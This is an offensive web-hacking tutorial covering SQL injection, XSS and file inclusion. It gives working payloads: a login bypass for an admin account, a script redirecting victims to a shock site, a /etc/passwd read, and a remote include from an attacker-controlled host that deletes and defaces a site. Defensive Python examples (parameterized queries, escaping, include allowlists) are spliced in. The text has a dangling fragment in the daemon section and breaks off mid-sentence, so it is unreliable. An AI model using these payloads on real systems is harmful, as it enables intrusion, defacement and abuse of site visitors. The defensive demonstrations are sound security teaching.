Hello and welcome to this tutorial. If you see all the text on this page and are afraid, you're not meant to be a hacker, quit now. Also, please know now that unlike in the movies, not everything is hackable. I will be writing about the basics of hacking servers: I will cover how to scan and/or exploit vulnerable daemons (services) running on the target server, and how to discover and/or exploit web-script vulnerabilities. You will need to know your way around a computer before reading this. If you don't know what a word means, Google or Wiki it; if you don't understand a concept, post here and I will try to clarify. Thanks for reading, hope this helps.
Recommended Tools
Port Scanner - nmap - http://nmap.org/
Browser - FireFox - http://firefox.com/
Daemon Vulnerabilities
Description
Daemons (also commonly known as services) are the processes that run on a computer that allow it to do things such as serve pages with the HTTP protocol, etc. (although they do not always necessarily interact over a network). Sometimes these daemons are poorly coded, which allows an attacker to send some sort of input to them so that they either crash, or in worse cases, run any code the attacker chooses.
vulnerability, which when run on the target server will make it crash.
SQL Injection
Description
SQL injection is the act of injecting your own, custom-crafted SQL commands into a web-script so that you can manipulate the database any way you want. Some example usages of SQL injection: bypass login verification, add a new admin account, lift passwords, lift credit-card details, etc.; you can access anything that's in the database.
Example Vulnerable Code - login.php (PHP/MySQL)
Here's an example of vulnerable login code. PHP Code:
<?php
$user = $_POST['u'];
$pass = $_POST['p'];
if (!isset($user) || !isset($pass)) {
    // No credentials submitted yet: show the login form.
    echo("<form method=post><input type=text name=u value=Username><br /><input type=password name=p value=Password><br /><input type=submit value=Login></form>");
} else {
    // Vulnerable: the raw POST values are pasted straight into the SQL string.
    $sql = "SELECT `IP` FROM `users` WHERE `username`='$user' AND `password`='$pass'";
    $ret = mysql_query($sql);
    $ret = mysql_fetch_array($ret);
    if ($ret[0] != "") {
        echo("Welcome, $user.");
    } else {
        echo("Incorrect login details.");
    }
}
?>
Basically, what this code does is take the username and password input and look up the user's IP in the database in order to check the validity of the username/password combo.
Testing Inputs For Vulnerability
Just throw a "'" into the inputs, and see if it outputs an error; if so, it's probably injectable. If it doesn't display anything, it might be injectable, and if it is, you will be dealing with blind SQL injection, which anyone can tell you is no fun. Else, it's not injectable.
The Example Exploit
Let's say we know the admin's username is Administrator and we want into his account. Since the code doesn't filter our input, we can insert anything we want into the statement, and just let ourselves in. To do this, we would simply put "Administrator" in the username box, and "' OR 1=1--" into the password box; the resulting SQL query to be run against the database would be "SELECT `IP` FROM `users` WHERE `username`='Administrator' AND `password`='' OR 1=1--'". Because of the "OR 1=1", it ignores the password requirement: as we all know, the logic of "OR" only requires one of its conditions to be true for it to succeed, and since 1 always equals 1, it works. The "--" is the 'comment out' sequence for SQL, which means everything after it is ignored; otherwise the trailing "'" would ruin the syntax and just cause the query to fail.
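To make the point above concrete from the defender's side, here is an added example (not code from the tutorial) that rebuilds the login.php lookup in Python against a constructed in-memory SQLite table, runs the tutorial's "' OR 1=1--" password and lone-quote probe through both the string-pasted query and a parameterized one, and shows that only the parameterized version is unaffected. The table contents and the password are made up for the demo; SQLite stands in for MySQL.

```python
import sqlite3

def make_db():
    # Constructed in-memory stand-in for the tutorial's `users` table (one admin row).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, IP TEXT)")
    conn.execute("INSERT INTO users VALUES ('Administrator', 'correct horse', '10.0.0.5')")
    return conn

def login_vulnerable(conn, user, pw):
    # Mirrors login.php: the raw inputs are pasted into the SQL text, so they can
    # change the grammar of the WHERE clause (' OR 1=1-- turns it into "always true").
    sql = f"SELECT IP FROM users WHERE username='{user}' AND password='{pw}'"
    return conn.execute(sql).fetchone() is not None

def login_parameterized(conn, user, pw):
    # The fix: bound parameters travel as values, never as SQL text, so a quote or a
    # comment sequence in the input is simply compared literally to the stored password.
    sql = "SELECT IP FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (user, pw)).fetchone() is not None

def quote_probe_errors(conn):
    # The tutorial's detection step: a lone quote breaks the vulnerable query's syntax,
    # which is exactly the error message the tutorial says to look for.
    try:
        login_vulnerable(conn, "'", "x")
    except sqlite3.OperationalError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, bypass payload:   ", login_vulnerable(db, "Administrator", "' OR 1=1--"))
    print("parameterized, bypass payload:", login_parameterized(db, "Administrator", "' OR 1=1--"))
    print("parameterized, real password: ", login_parameterized(db, "Administrator", "correct horse"))
    print("lone quote raises an error:   ", quote_probe_errors(db))
```

One portability caveat: SQLite treats "--" as a comment immediately, whereas MySQL only does so when whitespace follows it, so the exact error behaviour of the probe differs between engines even though the parameterized fix is the same in both.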
Cross-Site Scripting (XSS)
Testing Inputs For Vulnerability
For this, we test by throwing some HTML into the search engine, such as "<font color=red>XSS</font>". If the site is vulnerable to XSS, you will see the word XSS rendered in red; else, it's not vulnerable.
Example Exploit Code (Redirect)
Because we're mean, we want to redirect the victim to goatse (don't look that up if you don't know what it is) by tricking them into clicking on a link pointed to "search.php?search=<script>window.location='http://goatse.cz/'</script>". This will output "You searched for <script>window.location='http://goatse.cz/'</script>. There were no results found" (HTML), and assuming the target's browser supports JS (JavaScript), which all modern browsers do unless the setting is turned off, it will redirect them to goatse.
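As an added example (not the tutorial's search.php), the following Python reproduces the reflected "You searched for ..." output and puts the fix beside it: encoding the untrusted search term before echoing it, both in the page body and inside an attribute value, so the tutorial's probe and a script tag render as text instead of markup. The redirect target is a placeholder URL, not the one from the tutorial.

```python
import html

def render_results_vulnerable(term):
    # Mirrors the tutorial's search.php: the query string is echoed back verbatim, so
    # any HTML or <script> in it becomes part of the page the browser executes.
    return f"You searched for {term}. There were no results found"

def render_results_escaped(term):
    # The fix for body context: encode < > & " ' before the value reaches the HTML.
    return f"You searched for {html.escape(term, quote=True)}. There were no results found"

def render_search_box(term):
    # The same value reflected inside an attribute (the tutorial's forms use value=...).
    # quote=True also encodes " and ', so the input cannot close the attribute early
    # and add its own attributes or handlers.
    return f'<input type="text" name="search" value="{html.escape(term, quote=True)}">'

def reflects_raw_tag(output):
    # Check usable in a test or response filter: none of the probe tags may survive raw.
    return "<font" in output or "<script" in output

PROBE = "<font color=red>XSS</font>"                                        # the tutorial's test string
REDIRECT = "<script>window.location='http://example.invalid/'</script>"    # placeholder target

if __name__ == "__main__":
    print(render_results_vulnerable(PROBE))
    print(render_results_escaped(PROBE))
    print(render_results_escaped(REDIRECT))
    print(render_search_box('">' + REDIRECT))
```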
Remote/Local File Inclusion (RFI/LFI)
Description
This vulnerability allows the user to include a remote or local file and have it parsed and executed on the local server.
Example Vulnerable Code - index.php (PHP)
PHP Code:
<?php
$page = $_GET['p'];
if (isset($page)) {
    // Vulnerable: whatever the visitor passes in ?p= is handed straight to include().
    include($page);
} else {
    include("home.php");
}
?>
Testing Inputs For Vulnerability
Try visiting "index.php?p=http://www.google.com/"; if you see Google, it is vulnerable to RFI and consequently LFI. If you don't, it's not vulnerable to RFI, but it may still be vulnerable to LFI. Assuming the server is running *nix, try viewing "index.php?p=/etc/passwd"; if you see the passwd file, it's vulnerable to LFI; else, it's not vulnerable to RFI or LFI.
Example Exploit
Let's say the target is vulnerable to RFI and we upload the following PHP code to our server. PHP Code:
<?php
unlink("index.php");
system("echo Hacked > index.php");
?>
If we then view "index.php?p=http://our.site.com/malicious.php", our malicious code will be run on their server, and their site will simply say 'Hacked' from then on.
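Here is an added example (not the tutorial's index.php) of how the page selector should be handled instead: the "p" parameter is treated as a key into a fixed allowlist of page names, never as a path, and the chosen file is additionally confirmed to live under the include directory. It is written in Python so it runs stand-alone; the allowlist, the PAGE_ROOT directory and the resolve_page name are assumptions for the demo.

```python
import os
import re

# Constructed allowlist standing in for the tutorial's index.php: these are the only
# pages that can ever be included. The request parameter selects a key, not a file.
ALLOWED_PAGES = {"home": "home.php", "about": "about.php", "contact": "contact.php"}
PAGE_ROOT = os.path.realpath("/var/www/pages")   # assumed location of the include files
_NAME_RE = re.compile(r"[a-z0-9_-]{1,32}")       # no slashes, dots, colons or NUL bytes

def resolve_page(p):
    """Map the ?p= value to an absolute file path, or None if it is not allowed."""
    if p is None:
        p = "home"                          # same default as the tutorial's include("home.php")
    if not _NAME_RE.fullmatch(p):
        return None                         # rejects http://..., /etc/passwd, ../.., home.php
    filename = ALLOWED_PAGES.get(p)
    if filename is None:
        return None                         # valid-looking name, but not a page we serve
    path = os.path.realpath(os.path.join(PAGE_ROOT, filename))
    # Defence in depth: even an allowlisted entry must resolve inside PAGE_ROOT, so a
    # mistaken allowlist value or a stray symlink cannot point outside the directory.
    if os.path.commonpath([PAGE_ROOT, path]) != PAGE_ROOT:
        return None
    return path

if __name__ == "__main__":
    for probe in (None, "home", "about", "http://www.google.com/", "/etc/passwd",
                  "../../../etc/passwd", "home.php"):
        print(repr(probe), "->", resolve_page(probe))
```

In PHP itself, allow_url_include=Off (the default) stops include() from fetching URLs at all, and open_basedir confines file access to a chosen directory, which backs up the allowlist in the same way the PAGE_ROOT check does here.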
Conclusion
Tutorial inspired by: the avoidance of homework. Now that you've read all that,